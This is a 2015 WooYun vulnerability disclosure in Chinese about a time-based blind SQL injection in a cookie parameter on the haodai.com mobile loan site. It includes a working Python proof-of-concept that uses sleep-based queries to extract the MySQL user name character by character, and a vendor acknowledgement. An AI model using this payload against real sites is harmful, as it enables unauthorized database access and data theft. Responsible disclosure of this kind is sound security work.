当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0146902

漏洞标题:好贷网一处sql注入

相关厂商:好贷网

漏洞作者: 路人甲

提交时间:2015-10-15 12:11

修复时间:2015-11-29 13:46

公开时间:2015-11-29 13:46

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-15: 细节已通知厂商并且等待厂商处理中
2015-10-15: 厂商已经确认,细节仅向厂商公开
2015-10-25: 细节向核心白帽子及相关领域专家公开
2015-11-04: 细节向普通白帽子公开
2015-11-14: 细节向实习白帽子公开
2015-11-29: 细节向公众公开

简要描述:

看到妹子挖了个好贷网的注入,也来看看。
http://www.wooyun.org/bugs/wooyun-2015-0146718
还是蛮隐蔽的,太菜了,sqlmap跑不出

详细说明:

http://m.haodai.com/daikuan/xindailist

ipcity.jpg


延迟5秒确定用户名长度24
用户名为 [email protected]

漏洞证明:

#encoding=utf-8
import requests
import time
import string
import sys
import random
headers = {"Referer: http://m.haodai.com/guilin/"}
payloads = 'abcdefghijklmnopqrstuvwxyz0123456789@_.'
print '[%s] Start to retrive MySQL User:' % time.strftime('%H:%M:%S', time.localtime())
user = ''
for i in range(1, 25):
for payload in payloads:
try:
s = "ascii(mid(lower(user()),%s,1))=%s" % (i, ord(payload))
s = " and %s and sleep(5) " % s
cookies = {
"PHPSESSID":"p0hlf6mpadfcv58lndg6suiuu2",
"SOURCE_HOST":"m.haodai.com",
"SOURCE_URL":"http%3A%2F%2Fm.haodai.com%2Fguilin%2F",
"city":"guilin",
"CNZZDATA5129086":"cnzz_eid%3D189598607-1444437656-http%253A%252F%252Fsuzhou.haodai.com%252F%26ntime%3D1444437656",
"REF":"chd","ipcity":"suzhou' %s and '123'='123" % s
}
url = "http://m.haodai.com/daikuan/xindailist"
req = requests.get(url=url , cookies=cookies,timeout = 5)
print '.',
except:
user += payload
print '\n[in progress]', user,
time.sleep(3.0)
break
print '\n[Done] MySQL user is %s' % user

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-10-15 13:45

厂商回复:

感谢辛苦 ,我们马上修复 ,多谢

最新状态:

暂无